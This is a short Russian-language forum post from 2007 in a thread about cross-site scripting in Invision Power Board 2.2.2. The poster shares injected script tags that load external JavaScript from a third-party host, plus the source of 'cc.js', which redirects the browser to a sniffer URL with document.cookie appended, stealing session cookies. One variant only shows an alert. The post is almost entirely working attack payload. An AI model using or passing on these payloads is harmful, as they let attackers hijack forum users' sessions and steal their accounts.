Тема: Xss в Ipb 2.2.2
Показать сообщение отдельно

  #3  
Старый 15.08.2007, 12:55
Z0mbie!
Новичок
Регистрация: 14.08.2007
Сообщений: 10
Провел на форуме:
27258

Репутация: 1
По умолчанию

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/cc.js></SCRIPT>
отправляет куки. не пашет. сниффер s.netsec.ru.

//--></script><SCRIPT SRC=http://ccp.on.ufanet.ru/al.js></SCRIPT>
просто выводит алерт.пашет.

исходник cc.js
document.location="http://s.netsec.ru/CCCP.gif?"+document.cookie;
 
Ответить с цитированием